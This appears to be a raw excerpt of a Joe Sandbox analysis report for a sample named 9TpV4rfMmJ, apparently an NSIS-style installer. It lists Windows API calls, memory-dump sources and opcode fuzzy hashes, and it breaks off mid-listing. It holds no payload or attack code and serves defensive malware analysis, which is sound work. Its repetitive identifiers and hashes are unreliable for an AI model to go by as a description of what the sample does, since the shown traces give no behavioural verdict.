                                                                                                                      APIs
                                                                                                                      • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004034E2,00000000,00000000,00403306,000000FF,00000004,00000000,00000000,00000000), ref: 004060C4
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.250663501010.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.250663434516.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663585661.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663618581.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663786637.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663816094.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663848148.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663874621.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663928907.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_400000_9TpV4rfMmJ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: FileRead
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2738559852-0
                                                                                                                      • Opcode ID: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                                                                                                                      • Instruction ID: 1583d2e05e1cff28e3594e7db3f0db2d88eef65457287744bb544c492d9958e5
                                                                                                                      • Opcode Fuzzy Hash: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                                                                                                                      • Instruction Fuzzy Hash: AEE0EC322502AAABDF10AE65DC04AEB7B6CEB05361F018936FD16E6150E631E92197A4
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • VirtualProtect.KERNELBASE(7166505C,00000004,00000040,7166504C), ref: 71662A9D
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.250687189467.0000000071661000.00000020.00000001.01000000.00000004.sdmp, Offset: 71660000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.250687139142.0000000071660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250687238744.0000000071664000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250687268506.0000000071666000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_71660000_9TpV4rfMmJ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ProtectVirtual
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 544645111-0
                                                                                                                      • Opcode ID: cb1e166dd4d596e3151ced9c906e0b3cdf111fb0e70481fc76c4e79500643034
                                                                                                                      • Instruction ID: 0a1e6d9fc76ca4b393076a8b9a1b247bf8f6c25b29c66f8cb93d8ff3908e9d31
                                                                                                                      • Opcode Fuzzy Hash: cb1e166dd4d596e3151ced9c906e0b3cdf111fb0e70481fc76c4e79500643034
                                                                                                                      • Instruction Fuzzy Hash: 9CF0A5B260C381DEC351CF2B8D4A7093BF4B719384B24452AE589DE2A8E374C468CB91
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004044F7
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.250663501010.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.250663434516.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663585661.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663618581.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663786637.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663816094.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663848148.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663874621.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663928907.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_400000_9TpV4rfMmJ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3850602802-0
                                                                                                                      • Opcode ID: b985a0028b3d47d2300e38cb49a9103195f452c5c5dca8052d978926f7780193
                                                                                                                      • Instruction ID: 729772cd993a62bf3dcd5a53f5ba0c6067f9c4589e443fe2cdcdd0dddf41cb53
                                                                                                                      • Opcode Fuzzy Hash: b985a0028b3d47d2300e38cb49a9103195f452c5c5dca8052d978926f7780193
                                                                                                                      • Instruction Fuzzy Hash: 74C04CB1740605BADA108B509D45F0677546750701F188429B641A50E0CA74E410D62C
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • SendMessageW.USER32(00000028,?,00000001,004042F9), ref: 004044DC
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.250663501010.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.250663434516.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663585661.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663618581.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663786637.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663816094.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663848148.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663874621.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663928907.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_400000_9TpV4rfMmJ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3850602802-0
                                                                                                                      • Opcode ID: ea04ea026f55595d688d74c1d87789f1c1942be7a89ca5b988cfd0b6025de892
                                                                                                                      • Instruction ID: f9270ce27bc2d5d500308faa7c43699bdd9cec228278350af1c7ef3a72e6c056
                                                                                                                      • Opcode Fuzzy Hash: ea04ea026f55595d688d74c1d87789f1c1942be7a89ca5b988cfd0b6025de892
                                                                                                                      • Instruction Fuzzy Hash: 4FB01235181A00FBDE514B00DE09F857E62F7E4701F058038F341240F0CBB200A4DB08
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403242,?,?,?,?,?,?,0040387D,?), ref: 004034F3
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.250663501010.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.250663434516.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663585661.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663618581.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663786637.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663816094.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663848148.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663874621.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663928907.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_400000_9TpV4rfMmJ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: FilePointer
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 973152223-0
                                                                                                                      • Opcode ID: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                                                                                                                      • Instruction ID: 036c8468b6dd2e012b37e6e875261c5f60c7cf4634656b07e897873a541603b6
                                                                                                                      • Opcode Fuzzy Hash: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                                                                                                                      • Instruction Fuzzy Hash: 1FB01231140304BFDA214F10DF09F067B21BB94700F20C034B384380F086711435EB0D
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • KiUserCallbackDispatcher.NTDLL(?,00404292), ref: 004044C5
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.250663501010.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.250663434516.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663585661.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663618581.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663786637.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663816094.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663848148.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663874621.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663928907.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_400000_9TpV4rfMmJ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CallbackDispatcherUser
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2492992576-0
                                                                                                                      • Opcode ID: 88c3b14432b04161d4e03979afc52f71aef4d1a500ec292a4d39f98dda9e77ac
                                                                                                                      • Instruction ID: 0db23a64e3c973129ccb7351ad80e5cfa0365495cc8a336c35755b545d17f2be
                                                                                                                      • Opcode Fuzzy Hash: 88c3b14432b04161d4e03979afc52f71aef4d1a500ec292a4d39f98dda9e77ac
                                                                                                                      • Instruction Fuzzy Hash: 74A00275508601DBDE115B51DF09D057B71A7547017414579A18551034C6314461EB5D
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • GlobalAlloc.KERNELBASE(00000040,?,716612DB,?,7166137F,00000019,716611CA,-000000A0), ref: 716612C5
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.250687189467.0000000071661000.00000020.00000001.01000000.00000004.sdmp, Offset: 71660000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.250687139142.0000000071660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250687238744.0000000071664000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250687268506.0000000071666000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_71660000_9TpV4rfMmJ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AllocGlobal
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3761449716-0
                                                                                                                      • Opcode ID: 564a9dcf532f115bee28b4fbf20c9c316f45e4faff6bce436cce346cb8856a13
                                                                                                                      • Instruction ID: ae394dfabf2f31bf165f1ca29a041a3d55bd2cabb7fd8b350268264e18e374cc
                                                                                                                      • Opcode Fuzzy Hash: 564a9dcf532f115bee28b4fbf20c9c316f45e4faff6bce436cce346cb8856a13
                                                                                                                      • Instruction Fuzzy Hash: 15B01272A08100DFEF008B66CC0FF353264E700301F144000F600C8194C520C820C734
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • GetDlgItem.USER32(?,000003FB), ref: 004049D9
                                                                                                                      • SetWindowTextW.USER32(00000000,?), ref: 00404A03
                                                                                                                      • SHBrowseForFolderW.SHELL32(?), ref: 00404AB4
                                                                                                                      • CoTaskMemFree.OLE32(00000000), ref: 00404ABF
                                                                                                                      • lstrcmpiW.KERNEL32(Call,0042D268,00000000,?,?), ref: 00404AF1
                                                                                                                      • lstrcatW.KERNEL32(?,Call), ref: 00404AFD
                                                                                                                      • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404B0F
                                                                                                                        • Part of subcall function 00405B81: GetDlgItemTextW.USER32(?,?,00000400,00404B46), ref: 00405B94
                                                                                                                        • Part of subcall function 004067C4: CharNextW.USER32(?,*?|<>/":,00000000,00000000,76083420,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00406827
                                                                                                                        • Part of subcall function 004067C4: CharNextW.USER32(?,?,?,00000000,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00406836
                                                                                                                        • Part of subcall function 004067C4: CharNextW.USER32(?,00000000,76083420,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 0040683B
                                                                                                                        • Part of subcall function 004067C4: CharPrevW.USER32(?,?,76083420,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 0040684E
                                                                                                                      • GetDiskFreeSpaceW.KERNEL32(0042B238,?,?,0000040F,?,0042B238,0042B238,?,00000001,0042B238,?,?,000003FB,?), ref: 00404BD2
                                                                                                                      • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404BED
                                                                                                                        • Part of subcall function 00404D46: lstrlenW.KERNEL32(0042D268,0042D268,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404DE7
                                                                                                                        • Part of subcall function 00404D46: wsprintfW.USER32 ref: 00404DF0
                                                                                                                        • Part of subcall function 00404D46: SetDlgItemTextW.USER32(?,0042D268), ref: 00404E03
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.250663501010.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.250663434516.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663585661.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663618581.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663786637.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663816094.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663848148.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663874621.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663928907.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_400000_9TpV4rfMmJ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                                      • String ID: A$C:\Users\user\AppData\Local\Temp$Call
                                                                                                                      • API String ID: 2624150263-3142480687
                                                                                                                      • Opcode ID: 568cfc945b2c2d348d9aa634e0721f71816242e526caaa1dd2c9fa83d7973252
                                                                                                                      • Instruction ID: a81e8b8b6ddc8ea4f7a7a45a10ce21cc850824e22f7b82fba9ad49fead82d7d1
                                                                                                                      • Opcode Fuzzy Hash: 568cfc945b2c2d348d9aa634e0721f71816242e526caaa1dd2c9fa83d7973252
                                                                                                                      • Instruction Fuzzy Hash: CBA191B1900208ABDB119FA6DD45AAFB7B8EF84314F10803BF601B62D1D77C9A41CB6D
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                        • Part of subcall function 716612BB: GlobalAlloc.KERNELBASE(00000040,?,716612DB,?,7166137F,00000019,716611CA,-000000A0), ref: 716612C5
                                                                                                                      • GlobalAlloc.KERNEL32(00000040,00001CA4), ref: 71661D2D
                                                                                                                      • lstrcpyW.KERNEL32(00000008,?), ref: 71661D75
                                                                                                                      • lstrcpyW.KERNEL32(00000808,?), ref: 71661D7F
                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 71661D92
                                                                                                                      • GlobalFree.KERNEL32(?), ref: 71661E74
                                                                                                                      • GlobalFree.KERNEL32(?), ref: 71661E79
                                                                                                                      • GlobalFree.KERNEL32(?), ref: 71661E7E
                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 71662068
                                                                                                                      • lstrcpyW.KERNEL32(?,?), ref: 71662222
                                                                                                                      • GetModuleHandleW.KERNEL32(00000008), ref: 716622A1
                                                                                                                      • LoadLibraryW.KERNEL32(00000008), ref: 716622B2
                                                                                                                      • GetProcAddress.KERNEL32(?,?), ref: 7166230C
                                                                                                                      • lstrlenW.KERNEL32(00000808), ref: 71662326
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.250687189467.0000000071661000.00000020.00000001.01000000.00000004.sdmp, Offset: 71660000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.250687139142.0000000071660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250687238744.0000000071664000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250687268506.0000000071666000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_71660000_9TpV4rfMmJ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 245916457-0
                                                                                                                      • Opcode ID: 439d10108ad2f55699e455b8ea238d61a4cd724dcb28bf4894db578972c0762a
                                                                                                                      • Instruction ID: d5f79b75cf94cfca454eb47a0ca526914257efbca0bae5d0fd1ccad341da3846
                                                                                                                      • Opcode Fuzzy Hash: 439d10108ad2f55699e455b8ea238d61a4cd724dcb28bf4894db578972c0762a
                                                                                                                      • Instruction Fuzzy Hash: C122AEB1D0424ADFDB12CFA4C9846EEBBFAFB84305F10852ED166E62C0D7749A85CB51
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • CoCreateInstance.OLE32(004085F0,?,00000001,004085E0,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402229
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.250663501010.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.250663434516.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663585661.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663618581.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663786637.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663816094.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663848148.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663874621.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663928907.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_400000_9TpV4rfMmJ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateInstance
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 542301482-0
                                                                                                                      • Opcode ID: 58fea544f8465b7ca695cd277db4a94267474b575ac50a9b019070cedb53bd32
                                                                                                                      • Instruction ID: 5977cb51530078b600b156af0050786de557c4b464dd586e6a5beaa7a0440451
                                                                                                                      • Opcode Fuzzy Hash: 58fea544f8465b7ca695cd277db4a94267474b575ac50a9b019070cedb53bd32
                                                                                                                      • Instruction Fuzzy Hash: A7411571A00208EFCF40DFE4C989E9D7BB5BF49348B20456AF905EB2D1DB799981CB94
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040291A
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.250663501010.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.250663434516.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663585661.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663618581.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663786637.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663816094.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663848148.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663874621.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663928907.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_400000_9TpV4rfMmJ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: FileFindFirst
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1974802433-0
                                                                                                                      • Opcode ID: e3c555fdbd57f1008fac0fd93a6eb0fb110785489bc5405dabc14b2674c5a242
                                                                                                                      • Instruction ID: 3f6fbcf0fd4d311cdd608d5f72697756ed96b8559223cd5d9f1c4d92bc61f1b3
                                                                                                                      • Opcode Fuzzy Hash: e3c555fdbd57f1008fac0fd93a6eb0fb110785489bc5405dabc14b2674c5a242
                                                                                                                      • Instruction Fuzzy Hash: 3CF08271A04105EFD701DBA4ED49AAEB378FF14314F60417BE116F21D0E7B88E159B29
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.250663501010.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.250663434516.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663585661.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663618581.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663786637.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663816094.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663848148.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663874621.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663928907.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_400000_9TpV4rfMmJ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: fbe53aaae7eeab696340878b5eee03eb0fd33fb80e94407ce6853ed186f7d00c
                                                                                                                      • Instruction ID: 3db1d01f4341fbbb805040525b4c18df43ce82c239752998d09602440244d977
                                                                                                                      • Opcode Fuzzy Hash: fbe53aaae7eeab696340878b5eee03eb0fd33fb80e94407ce6853ed186f7d00c
                                                                                                                      • Instruction Fuzzy Hash: FEE18A71A0070ADFCB24CF59D880BAABBF5FB44305F15852EE496A72D1D338AA91CF45
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.250663501010.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.250663434516.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663585661.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663618581.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663786637.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663816094.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663848148.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663874621.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663928907.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_400000_9TpV4rfMmJ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: ad3a06017d63110f505e6ee1591874ec5e375aadb040ddd80f083a0c788ff2d1
                                                                                                                      • Instruction ID: 4d3fc1c80ea15bf86cc2801d6424e98614acddb7a54358772128df9d71e60e61
                                                                                                                      • Opcode Fuzzy Hash: ad3a06017d63110f505e6ee1591874ec5e375aadb040ddd80f083a0c788ff2d1
                                                                                                                      • Instruction Fuzzy Hash: C6C14871E042599BCF18CF68C8905EEBBB2BF88314F25866AD85677380D7347941CF95
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • GetDlgItem.USER32(?,000003F9), ref: 00404F1E
                                                                                                                      • GetDlgItem.USER32(?,00000408), ref: 00404F29
                                                                                                                      • GlobalAlloc.KERNEL32(00000040,?), ref: 00404F73
                                                                                                                      • LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404F8A
                                                                                                                      • SetWindowLongW.USER32(?,000000FC,00405513), ref: 00404FA3
                                                                                                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404FB7
                                                                                                                      • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404FC9
                                                                                                                      • SendMessageW.USER32(?,00001109,00000002), ref: 00404FDF
                                                                                                                      • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404FEB
                                                                                                                      • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404FFD
                                                                                                                      • DeleteObject.GDI32(00000000), ref: 00405000
